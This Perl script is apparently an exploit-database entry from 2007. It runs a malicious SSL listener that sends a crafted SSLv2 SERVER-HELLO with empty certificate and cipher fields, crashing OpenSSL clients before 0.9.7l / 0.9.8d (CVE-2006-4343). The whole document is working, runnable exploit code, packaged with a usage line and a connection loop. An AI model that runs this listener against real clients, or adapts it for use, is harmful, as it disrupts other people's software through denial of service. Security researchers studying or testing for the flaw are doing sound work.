
# Title : OpenSSL < 0.9.7l / 0.9.8d SSLv2 Client Crash Exploit
# Published : 2007-12-23
# Author : Noam Rathaus


#!/usr/bin/perl
# Copyright(c) Beyond Security
# Written by Noam Rathaus - based on beSTORM's SSL Server module
# Exploits CVE-2006-4343: an SSLv2-capable OpenSSL client (< 0.9.7l / < 0.9.8d) can be crashed
# (NULL-pointer dereference while parsing the SSLv2 SERVER-HELLO) by a specially crafted
# SERVER-HELLO from the server. The victim must connect to this listener and negotiate SSLv2.

use strict;
use warnings;
use IO::Socket;
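# Listening port. Defaults to 443 so an SSL client needs no special setup to
# reach us; binding below 1024 requires root, so an alternative port may be
# given as the first argument.
my $port = @ARGV ? $ARGV[0] : 443;
die "Usage: $0 [port]\n"
    unless $port =~ /^\d+$/ && $port > 0 && $port < 65536;

my $sock = IO::Socket::INET->new(
    LocalPort => $port,
    Proto     => 'tcp',
    Listen    => 1,
    Reuse     => 1,
) or die "Could not create socket: $!\n";

# Seconds to wait for the victim's CLIENT-HELLO before sending our reply.
my $TIMEOUT = 0.5;

# Build the malformed SSLv2 SERVER-HELLO record.
#
# Layout follows the SSLv2 SERVER-HELLO message: MSG-TYPE, SESSION-ID-HIT,
# CERTIFICATE-TYPE, SERVER-VERSION, CERTIFICATE-LENGTH, CIPHER-SPECS-LENGTH,
# CONNECTION-ID-LENGTH, then the three variable-length fields. The
# certificate and cipher-spec fields are deliberately empty (length 0):
# those zero-length fields are what a vulnerable client (CVE-2006-4343)
# mishandles. The 16-byte connection-id is arbitrary filler.
#
# Returns the complete record (2-byte SSLv2 record header + message) as a
# byte string.
sub build_server_hello {
    my $certificate   = '';
    my $ciphers       = '';
    my $connection_id = "\xf5\x61\x1b\xc4\x0b\x34\x1b\x11\x3c\x52\xe9\x93\xd1\xfa\x29\xe9";

    my $hello = join '',
        "\x04",                             # MSG-TYPE: SERVER-HELLO
        "\x01",                             # SESSION-ID-HIT
        "\x00",                             # CERTIFICATE-TYPE: none
        "\x00\x02",                         # SERVER-VERSION: SSLv2
        pack('n', length $certificate),     # CERTIFICATE-LENGTH (0)
        pack('n', length $ciphers),         # CIPHER-SPECS-LENGTH (0)
        pack('n', length $connection_id),   # CONNECTION-ID-LENGTH (16)
        $certificate,
        $ciphers,
        $connection_id;

    # SSLv2 record header: two bytes, top bit set means "2-byte header, no
    # padding", the remaining 15 bits carry the payload length. The payload
    # here is 27 bytes, but guard the limit so a larger payload can never
    # overflow into the header flag bit.
    my $len = length $hello;
    die "SSLv2 record too long: $len bytes\n" if $len > 0x7fff;
    return pack('n', $len | 0x8000) . $hello;
}

# The reply is identical for every client, so build it once.
my $server_hello = build_server_hello();

while (my $client = $sock->accept()) {
    print "new connection\n";

    # Wait up to $TIMEOUT seconds for the CLIENT-HELLO and drain it. The
    # four-argument select() needs a read mask with the client's descriptor
    # set; with an empty mask it merely sleeps and nothing is ever read.
    # Draining matters because close() on a socket with unread data may send
    # a RST, which can race our SERVER-HELLO on the victim's side.
    my $rin = '';
    vec($rin, fileno($client), 1) = 1;
    my $rout   = $rin;
    my $nfound = select($rout, undef, undef, $TIMEOUT);
    if ($nfound > 0) {
        my $client_hello;
        recv($client, $client_hello, 1024, 0);
    }

    print {$client} $server_hello
        or warn "Could not send SERVER-HELLO: $!\n";
    close($client);
}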
